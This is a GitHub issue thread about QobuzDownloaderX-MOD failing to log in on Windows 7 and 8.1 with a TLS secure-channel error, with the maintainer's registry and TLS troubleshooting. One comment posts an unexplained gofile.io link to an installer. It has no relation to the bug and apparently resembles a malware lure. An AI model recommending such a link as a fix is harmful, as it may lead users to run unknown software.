### ISSUE TITLE
[Bug]  Today I can't  log in

### ISSUE THREAD

**Issue by viviancels** [DJDoubleD/QobuzDownloaderX-MOD#102]
# **🐞 Bug Report**

## **Describe the bug**

Hello. I use QBDLX-MOD_1.2.5.0 because windows 8.1. From today cant log in. I used different IDs | Tokens. The program says: ID and secret obtained! Is the same problem on QBDLX-MOD_1.2.6.0? Or problem is with IDs | Tokens? Another person has such a problem, he told me that today he stopped being able to log in. I checked and it turned out that he was right. QobuzDownloaderX 0.9.9.24 logs in fine with same ID | token.
UPD third man (woman) says she has same problem. Also I checked 1.2.4.0 cannot log in, but some people say they log in normaly. It seems that issue is selective (random)

Log:
```
System.AggregateException: One or more errors occurred. ---> System.Net.Http.HttpRequestException: An error occurred while sending the request. ---> System.Net.WebException: The request was aborted: Could not create SSL/TLS secure channel.
   at System.Net.HttpWebRequest.EndGetResponse(IAsyncResult asyncResult)
   at System.Net.Http.HttpClientHandler.GetResponseCallback(IAsyncResult ar)
   --- End of inner exception stack trace ---
   at System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at QobuzApiSharp.Service.QobuzApiService.<SendAsync>d__36.MoveNext()
   --- End of inner exception stack trace ---
   at System.Threading.Tasks.Task.ThrowIfExceptional(Boolean includeTaskCanceledExceptions)
   at System.Threading.Tasks.Task`1.GetResultCore(Boolean waitCompletionNotification)
   at System.Threading.Tasks.Task`1.get_Result()
   at QobuzApiSharp.Service.QobuzApiService.LoginWithToken(String userId, String userAuthToken)
   at QobuzDownloaderX.LoginForm.LoginBG_DoWork(Object sender, DoWorkEventArgs e) in D:\a\QobuzDownloaderX-MOD\QobuzDownloaderX-MOD\QobuzDownloaderX\View\LoginForm.cs:line 329
---> (Inner Exception #0) System.Net.Http.HttpRequestException: An error occurred while sending the request. ---> System.Net.WebException: The request was aborted: Could not create SSL/TLS secure channel.
   at System.Net.HttpWebRequest.EndGetResponse(IAsyncResult asyncResult)
   at System.Net.Http.HttpClientHandler.GetResponseCallback(IAsyncResult ar)
   --- End of inner exception stack trace ---
   at System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   at QobuzApiSharp.Service.QobuzApiService.<SendAsync>d__36.MoveNext()<---
```

---

**Comment by JoelMoraes77** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by DJDoubleD** [comment]
I do not have a windows 8.1 system to try and reproduce this, but it seems to me that Qobuz updated their SSL certificate today and might have updated their servers to no longer allow connections below TLS 1.2.
These assumptions are based on:

1) Test results for Qobuz.com supported TLS versions [here](https://www.cdn77.com/tls-test/result?domain=https%3A%2F%2Fwww.qobuz.com%2F)
2) Qobuz SSL certificate info as of today: 
![image](https://github.com/user-attachments/assets/51d88b7d-a106-4d71-a432-ef81ddcba181)

In QBDLX-MOD (actually using [QobuzApiSharp](https://github.com/DJDoubleD/QobuzApiSharp/tree/master)), I do not specify explicit TLS versions to be used as it seems to be the [recommended best practice](https://learn.microsoft.com/en-us/dotnet/framework/network-programming/tls) to use the default TLS version set in the os.

@viviancels could you please verify if TLS 1.2 is in fact enabled and set as default on your system?
Hide.me seems to have a decent [guide page](https://hide.me/en/knowledgebase/how-to-enable-tls-1-1-tls-1-2-in-windows-7-and-8/) for this.
I also found this similar [article](https://www.tumblr.com/ryadel/188233814131/enable-tls-1-1-and-tls-1-2-on-windows-7-and-windows-8-os) that includes a .reg file you can download to enable TLS 1.2 (at the bottom of the page, I believe you need the [Download Registry Patch File to enable TLS 1.2 only](https://www.ryadel.com/wp-content/uploads/2019/10/TLSFix_TLS12.zip) version)

**Comment by viviancels** [comment]
@DJDoubleD
This folder is empty (there is ssl 2.0 folder inside only and it is disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\ 

This locations empty as well: 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp

I tried to install first update in the list for my Windows 8.1 x64 Pro: https://catalog.update.microsoft.com/search.aspx?q=kb3140245
but I recieved the error: "the update is not applicable  to your computer"
https://i.postimg.cc/2S5fTqdr/2024-09-05-081922.png

I will try to figure out how to install this update. Thank you.

all other updates are instaled well

**Comment by DJDoubleD** [comment]
@viviancels 
> I will try to figure out how to install this update. Thank you.

As I understand it, you don't need this update if you are on windows 8.1.
That patch seems to be for windows 7 and some windows 8 versions prior to 8.1.
Source: [this](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/security/enable-tls-1-2-client#bkmk_winhttp) Microsoft article:

> Windows 8.1, Windows Server 2012 R2, Windows 10, Windows Server 2016, and later versions of Windows natively support TLS 1.2 for client-server communications over WinHTTP.

Also taken from that [same ](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/security/enable-tls-1-2-client#install-net-updates )Microsoft article:

> NET Framework 4.6.2 and later supports TLS 1.1 and TLS 1.2. Confirm the registry settings, but no additional changes are required.

Since QBDLX-MOD 0.2.5.0 requires you to have the .net 4.8 framework installed, you should only need to update your registry settings to enable/use TLS 1.2 (or maybe TLS 1.1 & 1.2).

>This locations empty as well:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp

=> This further reinforces my assumption that you best change your registry settings.
If I where you, I would try the following actions:

1) Take a [backup ](https://support.microsoft.com/en-gb/topic/how-to-back-up-and-restore-the-registry-in-windows-855140ad-e318-2a13-2829-d428a2ab0692#ID0EBD=Windows_8.1 )of your registry
2) Install [The Registry Patch File to enable TLS 1.2 only](https://www.ryadel.com/wp-content/uploads/2019/10/TLSFix_TLS12.zip) (or maybe the version to [enable both TLS 1.1 and TLS 1.2](https://www.ryadel.com/wp-content/uploads/2019/10/TLSFix_TLS11-TLS12.zip)? )
3) Reboot your pc and retry logging in to QBDLX-MOD
4) In case of any problems, restore backup of your registry that you made in step 1

Please note that windows 8.1 has been unsupported for quite some time now and personally I would greatly advice to upgrade to at least windows 10 if at all possible.

Also disclaimer: I am not a networking security expert and as stated before, I do not have a windows 8.1 machine to test on, so all info and advice given above are purely my interpretations of the quoted documentation.

**Comment by viviancels** [comment]
@DJDoubleD "TLS 1.2 only" & "both TLS 1.1 and TLS 1.2" - tried both, rebooted 2 times. No result. 

Then tried this:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319]
"SchUseStrongCrypto"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319]
"SchUseStrongCrypto"=dword:00000001

Also no result.

Now I use it this way: I installed Windows 10 in VMWare, 1.2.5.0 and 1.2.6.0 both work there. Thank you for your time

**Comment by LiZhinGithub** [comment]
Hi, I have QBDLX-MOD_1.2.5.0 application based on Windows 7 system, and I also can't log in and get the above error, " Could not create SSL/TLS secure channel."
I wonder if the author can optimize the modification for version 1.2.5.0, otherwise it will be impossible to use it on the old version system, thanks and looking forward to your reply!

**Comment by LiZhinGithub** [comment]
Windows7系统注册表已进行修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client]
"Enabled"=dword:00000001
"DisabledByDefault"=dword:00000000
系统补丁kb3140245已安装，但是仍然报错无法登录使用

**Comment by LiZhinGithub** [comment]
Windows 7 system registry has been modified
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client]
"Enabled"=dword:00000001
"DisabledByDefault"=dword:00000000
System patch kb3140245 installed, but still reporting error can't log in to use it

**Comment by orbittwz** [comment]
I don't understand why you want support from the author whereas you have EOL operating system.
Either move to Windows 10 22H2 or Windows 11 23H2 or close this issue please.

**Comment by ian-barber** [comment]
No longer appears to be working on Windows 11

**Comment by orbittwz** [comment]
How is this relevant to the issue?

**Comment by ian-barber** [comment]
> How is this relevant to the issue?

I thought the relevance was in the title "[Bug] Today I can't log in". Maybe I need to open a new Issue

**Comment by orbittwz** [comment]
maybe close this?

**Comment by DJDoubleD** [comment]
I have no plans of trying to support obsolete TLS.

**Comment by orbittwz** [comment]
should be closed.
